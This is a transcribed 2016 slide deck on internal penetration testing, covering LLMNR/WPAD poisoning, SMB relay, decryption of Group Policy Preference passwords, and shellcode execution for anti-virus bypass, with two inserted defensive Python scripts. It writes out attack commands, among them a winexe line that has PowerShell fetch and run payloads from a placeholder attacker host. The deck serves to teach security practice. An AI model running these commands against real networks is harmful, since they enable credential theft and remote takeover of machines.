Internal Pentest: from z3r0 to h3r0

Information about Internal Pentest: from z3r0 to h3r0

Published on November 23, 2016

Author: marcioalma

Source: slideshare.net

1. THE BIGGEST HACKER FESTIVAL IN LATIN AMERICA

2. Internal Pentest From z3r0 to h3r0 by Márcio "pimps" Almeida

3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida
* Disclaimer *
• Slides in English but I'll speak in Portuguese.
• This presentation doesn't have any tool created or invented by me, only how I use "well known" tools and how I automate their use...
• On this presentation I'll only talk about ideas and tricks that I personally use during Internal penetration test engagements.

4. whoami
• a.k.a. Pimps
• CTF Player (web and crypto)
• Proud Member of TheGoonies CTF Team
  • Check our writeups at: https://thegoonies.rocks
• Penetration Tester (7+ years)
  • Tempest, Cipher, SpiderLabs and Securus Global
• Previous Presentations
  • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS…

5. Scenario we will talk about
• Internal Penetration Testing
• 100% Black Box (Plug and Play)
• Time constraints (3-5 days)
• Without "low-hanging fruits"
• Anti-virus and some other protections in place

6. Agenda
• Unfortunately we have only 40 minutes, so I chose:
  • Reconnaissance Tricks on Blackbox Testing
  • LLMNR and NBT-NS Poisoning
  • GPOs / GPPs
  • Shellcode Execution - SCE

7. RECONNAISSANCE TRICKS ON BLACKBOX TESTING

8. Domain Computer Accounts
• First enumerate all Domain Controllers:
  • nslookup
  • ping domain_name
  • dsquery
  • Etc…
• Use enum4linux to enumerate all users on the domain (if null session is enabled, or using a credential).
• Extract all machine account names (accounts whose username ends with $, like user$).
• Nmap all those userX$.domain_name names to get their IP addresses and open ports. Repeat the nmap process on all the different subnets.

9. Identifying "Live Subnets"
• You don't need to scan all IPs to identify live subnets…
• Scan well-known IP addresses on well-known ports to identify live addresses in subnets:
  • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254
  • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389

10. Identifying "Live Hosts"
• Once you find a subnet with a live IP, scan the whole subnet with a tuned nmap command:
  • nmap -A -T4 -n --top-ports 1000 --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s x.x.x.0/24

11. LLMNR AND NBT-NS POISONING

12. LLMNR and NBT-NS Poisoning
• The victim machine wants to go to the print server at printserver, but mistakenly types pintserver.
• The DNS server responds to the victim saying that it doesn't know that host.
• The victim then asks whether anyone on the local network knows the location of pintserver.
• The attacker responds to the victim saying that he actually is pintserver.
• The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.
• The attacker can now crack the hash to discover the password.

13. LLMNR and NBT-NS Poisoning

14. Responder by @lgandx
https://github.com/lgandx/Responder
• Performs LLMNR/NBT-NS/mDNS poisoning in an easy and highly effective way and stores the captured hashes and clear-text credentials into files.
• Prerequisites: Install Python
  • git clone https://github.com/lgandx/Responder.git
  • cd Responder
  • ./Responder.py -I eth0 -rPv
• Use john or hashcat to crack the captured NTLMv2 hashes via dictionary attack… If you don't have a good wordlist you can use rockyou.txt. It works well for me on most occasions...
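A defender-side check for the poisoning described on slides 12 and 14, added here as an example and not part of the original deck or of Responder: it sends an LLMNR query for a random name that cannot exist on the network, so any host that answers is a poisoner and should be investigated. The probe(), build_llmnr_query() and parse_llmnr_answer() functions are this example's own; the message layout follows RFC 4795, which reuses the DNS packet format.

```python
import os
import socket
import struct

def build_llmnr_query(name, txid):
    """LLMNR A query: DNS-style 12-byte header (flags=0), QNAME labels, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)

def _skip_name(data, pos):  # advance past a label sequence or a 0xC0xx compression pointer
    if data[pos] & 0xC0 == 0xC0:
        return pos + 2
    while data[pos] != 0:
        pos += data[pos] + 1
    return pos + 1

def parse_llmnr_answer(data, txid):
    """IPv4 addresses in a response to our txid; None if the packet is not such a response."""
    if len(data) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:   # id mismatch or QR bit clear
        return None
    pos = 12
    for _ in range(qd):                     # skip the echoed question section
        pos = _skip_name(data, pos) + 4
    addrs = []
    for _ in range(an):
        pos = _skip_name(data, pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:       # A record
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs

def probe(timeout=2.0):  # ask for a random name nobody owns; return the source IPs that answered anyway
    name, txid = "nx-" + os.urandom(6).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), ("224.0.0.252", 5355))  # RFC 4795 group/port
    hits = []
    try:
        while True:                         # collect every answer until the timeout
            data, (src, _) = sock.recvfrom(512)
            if parse_llmnr_answer(data, txid):
                hits.append(src)
    except socket.timeout:
        return hits
```

Run probe() periodically from a monitoring host on each segment; a legitimate network returns an empty list, and any address it does return is the poisoner's. The durable fix is to disable LLMNR and NBT-NS by group policy so the victim never asks the local network at all.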

15. DEMO Responder by @lgandx
https://www.youtube.com/watch?v=mgAHX4h1ojI

16. Responder + Proxenet by @hugsy
https://proxenet.readthedocs.io/en/dev/mitm/
• Use Responder to spoof NetBIOS packets and poison the WPAD configuration of the Windows workstations on the local network, redirecting their traffic to our evil box.
• Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it:
  • ln -sf proxenet-plugins/oPhishPoison.py proxenet-plugins/autoload/oPhishPoison.py
  • ./proxenet -b YOUR_IP -p 8008 -i -N
• From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads.
• Please visit the link for detailed configuration.

17. DEMO Responder + Proxenet by @hugsy
https://www.youtube.com/watch?v=eN_HwFkyYyw

18. Quick Overview: SMBRelay

19. Responder + MultiRelay
http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
• MultiRelay was built to work in conjunction with Responder.py; the common usage scenario is:
  • Set SMB and HTTP to Off in Responder.conf
  • ./Responder.py -I eth0 -rv (on one screen)
  • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen)

20. Responder + MultiRelay
http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
• Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:
  • Remotely dump the LM and NT hashes on the target (which you can pass-the-hash with afterwards)
  • Remotely dump any registry keys under HKLM (sensitive information and configurations)
  • Read any file on the target.
  • Download any file from the target.
  • Execute any command as SYSTEM on the target.

21. MultiRelay DEMO by @lgandx
https://www.youtube.com/watch?v=c5GT9pAtnIw

22. GPO – GROUP POLICY OBJECT / GPP – GROUP POLICY PREFERENCES

23. Group Policies (GPO)
• SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access.
• SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available everywhere.
• All domain Group Policies are stored here:
  • \\<DOMAIN_CONTROLLER>\SYSVOL\<DOMAIN_NAME>\Policies

24. Clear-text Credentials on SYSVOL

25. Group Policy Preferences (GPP)
• In 2006, Microsoft bought Desktop Standard's "PolicyMaker", which they re-branded and released with Windows Server 2008 as "Group Policy Preferences."
• One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change the local admin password, configure printers, configure shares, configure services, etc).
• Those credentials are stored encrypted. They are encrypted with AES-256, which should be good enough… But…

26. Thanks Microsoft ;-*
https://msdn.microsoft.com/en-us/library/cc422924.aspx (the MSDN page that publishes the AES key used for the cpassword attribute)

27. Decrypting GPP cpassword
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Local*P4ssword!

28. Metasploit Module GPP
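An audit for the SYSVOL exposure covered on slides 23 to 28, added here as an example and not part of the original deck, of gpp-decrypt or of Get-GPPPassword: it walks a copy (or a mounted share) of the Policies tree and reports every preference element that still carries a cpassword attribute, so an administrator can find and remove them; the fix Microsoft shipped in 2014 stops new cpassword entries being written, but existing ones stay in SYSVOL until removed. The file-to-account-attribute mapping, the sample Groups.xml written by make_sample_tree() and its policy GUID are constructed assumptions; the cpassword value is the one shown on slide 27.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword, and the attribute naming the account
# in each (constructed mapping, assumed from the preference types named on slide 25).
GPP_FILES = {"Groups.xml": "userName", "Services.xml": "accountName",
             "ScheduledTasks.xml": "runAs", "DataSources.xml": "username",
             "Drives.xml": "userName", "Printers.xml": "userName"}
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")   # the GPO GUID is a path component

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="Administrator (built-in)">
<Properties action="U" userName="Administrator (built-in)" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
</User></Groups>"""

def make_sample_tree():
    """Write a constructed Policies tree (one GPO, one Groups.xml) into a temp dir."""
    base = tempfile.mkdtemp()
    d = os.path.join(base, "{11111111-2222-3333-4444-555555555555}", "Machine", "Preferences", "Groups")
    os.makedirs(d)
    with open(os.path.join(d, "Groups.xml"), "w") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return base

def find_cpasswords(policies_dir):
    """Return one finding per element in the tree that still carries a cpassword attribute."""
    findings = []
    for dirpath, _, files in os.walk(policies_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue                      # not well-formed: skip it, keep auditing
            guid = GUID_RE.search(path)
            for elem in root.iter():
                cpassword = elem.get("cpassword")
                if cpassword is None:
                    continue
                findings.append({
                    "policy": guid.group(0) if guid else "?",
                    "file": fname,
                    "account": elem.get(GPP_FILES[fname], ""),
                    "empty": cpassword == "",   # a blank password is still a finding
                })
    return findings
```

Every finding is a credential that any authenticated domain user can read and decrypt; the remediation is to delete the preference item, rotate the account's password, and check the other preference files in the same GPO.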

29. SHELLCODE EXECUTION - SCE

30. Shellcode Execution - SCE
• HIGHLY EFFECTIVE for anti-virus bypass
• My own experience: it worked perfectly 100% of the times I needed to use it.
• Works beautifully using winexe or psexec (God bless Pass the Hash :-P)
• Using a Domain Admin account it is possible to automate the mass p0wn4g3 on the network by "scripting" the command and reading the targets from a list.
• Using a Meterpreter script you can also automate the capture of evidence on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…)

31. Shellcode Execution - SCE
• Using Microsoft PowerShell it is possible to download the binary (wget-like style) to a temporary directory, execute it and erase the file afterwards:
• On the attacker machine execute: python -m SimpleHTTPServer
  • This serves http://YOUR_MACHINE:8000/ from the attacker machine
• winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat""

32. SCEPWN-NG by @joshuaskorich
https://github.com/joshuaskorich/scepwn-ng
• Using a Samba share you can execute the binary directly from the shared folder, injecting the Meterpreter session directly into memory without any file ever touching the disk!
• Details of how to configure the environment are on the scepwn-ng GitHub page.
• After configuring your environment and getting a privileged account, just execute:
  • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET
• If you put this command in a loop that reads from a list of targets and use a Meterpreter script to automate commands on the targets, it becomes a mass auto-pwn tool.

33. Thank you! Twitter: @marcioalm Email: marcioalma@gmail.com #dontstophacking
